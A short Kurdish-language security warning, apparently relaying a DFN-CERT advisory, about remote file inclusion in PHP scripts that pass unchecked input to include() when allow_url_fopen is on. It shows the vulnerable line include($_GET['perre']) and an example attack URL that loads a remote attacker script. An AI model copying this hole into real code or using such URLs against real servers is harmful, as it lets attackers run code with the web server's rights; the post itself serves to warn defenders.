هێرشی توند بۆ سەر هەندێك سكریپتی php!: ئەوەی كە
DFN-CERT و هەندێك شوێنی تر لێی ئەدوێن، سەبارەت بە هێرشێكی زۆر ترسناك بۆ سەر چەند جۆرێك لە سكریپتی php، لە ڕاستیدا زۆر لە سكریپتەكانی سەر ئینتەرنێتی گرتۆتەوە!
ئەنجامی ئەم هێرشەش دەبێتە ئەوەی كە ڕاژەكاری وێب(web-server) بتوانێ لەسەر سیستەمەكە بیكات
هێرشكەریش دەتوانێت بە واتاییەكی دی هێرشكەر هەموو مافەكانی ڕاژەكاری وێبەكە وەر دەگرێت.
چ جۆر سكریپتێك دەگرێتەوە؟
ئەوانەی زۆر بە بێ باكیی
گۆڕاوێك پێناسە دەكەن، بێ ئەوەی لە ئەگەری نرخەكەی بكۆڵنەوە.
مەرجە لە php.ini دا نرخی allow_url_fopen چالاك كردبێت، واتە "allow_url_fopen=on".
هەر سكریپتێك ئەو خاڵانەی سەرەوەی تێدا بێت، لەبەردەم ئەو هێرشە وەستانی وەك مەحاڵ وایە.
نموونە:
لە سكریپتێكدا سكریپتنووس بەم شێوەیە پێناسەی گۆڕاوێك دەكات:
include($_GET['perre']);
پاشان هێرشكەر دەتوانێت لای خۆیەوە بەم شێوەیە دەست بە هێرش بكات
http://servere-chakeke.com/skripteki-neparezraw.php?perre=http://servereki-turre.con/skripteki-turre.php
سەرچاوە